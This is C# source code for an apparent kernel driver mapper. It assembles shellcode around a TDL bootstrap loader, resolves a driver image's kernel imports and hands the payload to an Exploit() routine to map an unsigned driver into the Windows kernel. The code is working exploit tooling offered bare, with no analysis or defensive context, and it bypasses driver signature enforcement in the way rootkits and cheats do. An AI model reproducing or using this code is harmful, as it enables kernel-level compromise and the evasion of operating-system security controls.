public static void MapDriver(String driverPath) { Unload(); Load(); try { var imageBase = Natives.LoadLibrary(driverPath); var ExAllocatePoolWithTag = Natives.FindKernelProcedure("ExAllocatePoolWithTag"); var shellcode = new List <Byte>(); shellcode.Add(0x48); // mov rcx, ExAllocatePoolWithTag shellcode.Add(0xb9); shellcode.AddRange(BitConverter.GetBytes(ExAllocatePoolWithTag)); shellcode.AddRange(Shellcode.TDLBootstrapLoader_code_w10rs2); var image = new Byte[0x7000]; // todo, pull from memory Marshal.Copy(imageBase, image, 0, image.Length); image = ImportResolver.ResolveKernelImports(image); while (shellcode.Count() != 0x30a) { shellcode.Add(0); } shellcode.AddRange(image); Exploit(shellcode.ToArray(), 0x8000, 0x30a); } catch (Exception e) { Console.WriteLine(e.Message); } finally { Unload(); } }
public static Byte[] ResolveKernelImports(Byte[] Image) { var headerOffset = BitConverter.ToInt32(Image, 0x3c); var optionalHeaderOffset = headerOffset + 0x18; var numberOfRva = BitConverter.ToInt32(Image, optionalHeaderOffset + 0x6c); if (numberOfRva <= 1) { return(Image); } var importTableVa = BitConverter.ToInt32(Image, optionalHeaderOffset + 0x78); if (importTableVa == 0) { return(Image); } var originalThunkPtr = BitConverter.ToInt32(Image, importTableVa + 0); var baseThunkPtr = BitConverter.ToInt32(Image, importTableVa + 16); for (int i = 0; ; i++) { var originalThunk2 = BitConverter.ToInt64(Image, originalThunkPtr + i * 8); if (originalThunk2 == 0) { break; } var thunk = BitConverter.ToInt64(Image, baseThunkPtr + i * 8); if (originalThunk2 > 0) { var name = Encoding.Default.GetString(Image.Skip((int)originalThunk2 + 2).TakeWhile(b => b != 0).ToArray()); Array.Copy(BitConverter.GetBytes((UInt64)Natives.FindKernelProcedure(name)), 0, Image, baseThunkPtr + i * 8, 8); } else { throw new Exception("Fix this"); } } return(Image); }